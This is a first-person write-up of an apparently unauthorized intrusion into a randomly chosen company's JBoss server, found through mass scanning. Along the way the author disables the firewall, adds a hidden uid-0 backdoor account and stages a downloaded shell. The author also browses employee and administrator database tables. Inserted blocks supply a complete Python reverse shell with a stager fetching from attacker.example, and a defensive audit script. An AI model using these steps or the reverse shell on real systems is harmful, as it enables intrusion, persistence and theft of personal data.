Notes from a tortuous penetration test

Yesterday I integrated the jexboss script into my multi-threaded framework, scanned JBoss instances across the country, and found more than a thousand shells.

The tool address is: https://github.com/Xyntax/POC-T

For this test I picked, more or less at random, what looked like a large company.

Finding a foothold

Got a shell through jexboss; the box is a CentOS machine (the IP has been masked).

It looked like root, and I double-checked.

An unstable foothold

Problems with the shell

When I went on to run commands, the shell that ships with jexboss turned out to be very unstable. All sorts of problems came up, including but not limited to these two serious ones:
- Interactive commands crash the program and exit. For example, cat echoes normally, but vi makes the shell report an error and quit outright.
- When a command fails, there is no output at all.

I had to build myself a stable shell.

Trying nc

Seeing that the system has nc, I wanted to use it to get a stable shell back, but none of the nc commands I submitted produced any output, and no shell connected back.

Trying Python

Gave up on nc and checked whether the system has python: python --version again produced no output, but python -h did. (Python 2 writes --version to stderr, which is most likely why a channel that only returns stdout showed nothing.)

Then I tried to get a shell back with python. I used this code and it did not work, which was odd.

I tried a plain print as well: still no output!

Why?

Thinking about it: if a command errors, there is no output. The error is most likely that special characters in the code, ( ) ' ", are being mangled in transit.

I tested this with a few simple shell commands and confirmed the guess:
- A command containing any of ' " | > >> & ( ) is not executed and produces no output.

What does this mean?

It means I basically cannot run any command containing shell metacharacters through this shell!
No nc, no python one-liners, no pipes, no redirection.

Trying SSH

The shell looked nearly useless, so I checked processes, ports and the iptables firewall, and found some targeted rules, meaning some defences are in place. Seeing port 22, I turned the firewall off without hesitation. Create a new user and ssh in from outside, then?

So I created a new root-equivalent user:
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash php

(-o allows a duplicate uid, -u 0 -g 0 make it uid and gid 0, -M creates no home directory, -d /root and -s /bin/bash set the home and shell, and php is the account name.)

Checked /etc/passwd: the entry is there, creation succeeded!

Then, when setting its password:
passwd php

No output!!!
Setting a password takes several rounds of interaction, and as noted above, interactive commands error out and exit without output. Stuck again.

sshd normally does not accept empty-password logins. I tried anyway, and the result was:
ssh: connect to host 183.xxx.xxx.xxx port 22: Connection refused

I checked the sshd configuration with cat /etc/ssh/sshd_config. The start of the file:

#   $OpenBSD: sshd_config,v 1.97 2015/08/06 14:53:21 deraadt Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 2525

#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

Besides empty-password logins being disabled (sshd's default), the administrator had also moved sshd from the default port 22 to 2525, which explains the Connection refused above.

So what if I added a line to the configuration allowing empty-password login?

But I cannot type shell metacharacters through this shell, and there is no interactive editor either! vi crashes outright, sed does not work, and echo with redirection does not work...
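The two host-side changes made so far, a second uid-0 account and an sshd configuration worth reading closely, are exactly what a defender (or anyone auditing a box after a compromise) should be looking for. The following is an added example, not code from this write-up, that pulls those checks out of /etc/passwd and sshd_config text; the sample inputs are constructed to mirror the useradd command and the config excerpt above. It applies sshd's own rules for the file: uncommented lines override the defaults and, when a keyword appears more than once, the first value wins.

```python
# Added example (not from the write-up): audit the traces this intrusion leaves.
# A second uid-0 account in /etc/passwd and an sshd_config that allows empty
# passwords or moves the listening port are both one-line checks.

# Constructed /etc/passwd: 'php' mirrors the useradd -o -u 0 -g 0 ... above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
jboss:x:500:500::/home/jboss:/bin/bash
php:x:0:0::/root:/bin/bash
"""

# Constructed sshd_config mirroring the excerpt on the page (Port 2525, the
# rest commented out), plus one extra uncommented line for the demo.
SAMPLE_SSHD_CONFIG = """\
#   $OpenBSD: sshd_config,v 1.97 2015/08/06 14:53:21 deraadt Exp $
Port 2525
#AddressFamily any
#ListenAddress 0.0.0.0
#PermitEmptyPasswords no
PasswordAuthentication yes
"""


def uid0_accounts(passwd_text):
    """Names of every account whose uid field is 0 (root should be the only one)."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        # passwd(5): name:password:uid:gid:gecos:home:shell
        if len(fields) == 7 and fields[2] == "0":
            names.append(fields[0])
    return names


def sshd_effective(config_text, keyword, default):
    """Effective global value of one sshd_config keyword.

    sshd_config(5): uncommented lines override the default and, for a keyword
    given more than once, the first value wins. Both 'Keyword value' and
    'Keyword=value' spellings are accepted. Match blocks and Include are not
    evaluated; parsing stops at the first Match line, so the result is the
    global setting only.
    """
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower().startswith("match "):
            break
        parts = line.split(None, 1)
        key = parts[0]
        value = parts[1] if len(parts) > 1 else ""
        if "=" in key:
            key, _, rest = key.partition("=")
            value = (rest + " " + value).strip()
        if key.lower() == keyword.lower():
            return value.strip()
    return default


def audit(passwd_text, config_text):
    """Return human-readable findings; an empty list means nothing odd."""
    findings = []
    extra = [n for n in uid0_accounts(passwd_text) if n != "root"]
    if extra:
        findings.append("uid-0 accounts besides root: " + ", ".join(extra))
    port = sshd_effective(config_text, "Port", "22")
    if port != "22":
        findings.append("sshd listens on non-default port " + port)
    if sshd_effective(config_text, "PermitEmptyPasswords", "no").lower() == "yes":
        findings.append("sshd permits empty passwords")
    # Only an explicit 'yes' is reported: the default for this keyword changed
    # across OpenSSH versions, so it is not assumed here.
    if sshd_effective(config_text, "PermitRootLogin", "").lower() == "yes":
        findings.append("sshd explicitly permits root (any uid-0) login")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_PASSWD, SAMPLE_SSHD_CONFIG):
        print("FINDING: " + finding)
```

Point it at the real files with audit(open('/etc/passwd').read(), open('/etc/ssh/sshd_config').read()). One caveat that matters for this write-up: sshd applies PermitRootLogin to every account with uid 0, not only to the name root, so a php account created with -u 0 is governed by that setting even though its name differs.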

A stable foothold

Given how crippled this shell is, writing anything onto the system looked hopeless, but downloading code from outside and running it locally should still work. After all, Python is there.

wget xxx.xxx.xxx contains no special characters, so it should go through.

I put a script on my server and wget'd it from the target.
When ls showed the file, I was thrilled!

Then python shell.py, and when the sh-4.1 prompt came back I knew it had worked!

After that I set the password for the user I had created, connected over ssh from outside, and the foothold was finally stable.
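The workaround above relies on two things: the staging commands must use only characters the jexboss channel passes through, and the downloaded script must hand back one long-lived shell instead of running a command at a time. The page shows the script only as a screenshot, so what follows is an added example written for this write-up, not the author's script: a minimal connect-back shell in Python, a helper that checks a command against the characters found to break the channel, and a loopback listener standing in for nc so the whole exchange can be run on one machine. The listener address, port and download URL are placeholders.

```python
#!/usr/bin/env python
# Added example, not the author's script (the page only shows it as a
# screenshot): a minimal connect-back shell of the kind the write-up fetches
# with wget and starts with `python shell.py`, plus a check that the two
# staging commands avoid the characters the jexboss channel was found to drop.
import socket
import subprocess
import sys
import threading

# Placeholders: the operator's listener is never shown on the page.
LHOST = "127.0.0.1"
LPORT = 4444

# The characters the write-up found the one-shot channel could not carry.
BAD_CHARS = set("'\"|>&()")


def channel_safe(cmd):
    """True if cmd contains none of the characters that break the channel."""
    return not (BAD_CHARS & set(cmd))


def stager_commands(url):
    """The two commands typed into the fragile shell: fetch, then run.
    Both stay metacharacter-free as long as the URL is (no '?' query, no '&')."""
    return ["wget " + url, "python " + url.rsplit("/", 1)[-1]]


def connect_back(host, port):
    """Target side: connect out and attach /bin/sh to the socket.

    The shell's stdin/stdout/stderr are the socket itself, so every later
    command runs inside one persistent sh where quoting, pipes and redirection
    work, instead of a fresh one-shot execution that returns stdout only.
    No pty is allocated; see the note below the code for the upgrade.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    fd = s.fileno()
    proc = subprocess.Popen(["/bin/sh", "-i"], stdin=fd, stdout=fd, stderr=fd)
    proc.wait()
    s.close()
    return proc.returncode


def listen_once(port, commands, result):
    """Operator side, standing in for `nc -lvp PORT`: accept one shell, feed it
    the commands followed by exit, and collect everything it sends back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    result["port"] = srv.getsockname()[1]  # the real port when 0 was requested
    result["ready"].set()
    conn, _ = srv.accept()
    conn.sendall(b"".join(c + b"\n" for c in commands) + b"exit\n")
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    srv.close()
    result["output"] = b"".join(chunks)


def local_demo(commands=(b"echo staged_ok", b"id")):
    """Run both ends on loopback and return the bytes the shell sent back."""
    result = {"ready": threading.Event()}
    t = threading.Thread(target=listen_once, args=(0, commands, result))
    t.start()
    result["ready"].wait(5)
    connect_back("127.0.0.1", result["port"])
    t.join(10)
    return result.get("output", b"")


if __name__ == "__main__":
    if "--connect" in sys.argv:  # what the uploaded copy would do
        sys.exit(connect_back(LHOST, LPORT))
    for cmd in stager_commands("http://attacker.example/shell.py"):
        print("%-40s channel_safe=%s" % (cmd, channel_safe(cmd)))
    print(local_demo().decode("utf-8", "replace"))
```

Run as python shell.py to see the loopback round trip; on an engagement the listener is nc -lvp PORT on the operator's host, LHOST and LPORT are edited before the file is uploaded, and it is started with python shell.py --connect. Because no pty is allocated, commands that need a terminal (passwd, vi) still misbehave inside it; once connected, python -c "import pty; pty.spawn('/bin/bash')" fixes that, and the quotes are no longer a problem because that command now travels over the socket rather than through the jexboss channel.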

Browsing the database

With a stable shell, time to look at the database.

First look for related commands in the shell history:
cat ~/.bash_history |grep sql

There is something there:

And into the database without effort:

The mysql command line is familiar territory.

use information_schema

select table_name,table_rows from tables where TABLE_SCHEMA = 'cloudcompany' order by table_rows desc;

(TABLE_ROWS is only an estimate for InnoDB tables, exact for MyISAM; use count(*) on a table when the exact size matters.)

Administrator table:

All employee data (216 rows); here is one:

A few of the more useful columns:

Another table (300,000 rows):

Epilogue

The database does not hold much. Doing the work and writing it up at the same time is slow; it has taken nearly four hours. I won't go into the intranet; that is left for another time.

Note: All sensitive data in this article has been masked; it is for technical exchange only. The incident has been reported to the WooYun (Wuyun) vulnerability platform.

Please indicate the source when reprinting, and inform me by
mail: [email protected]
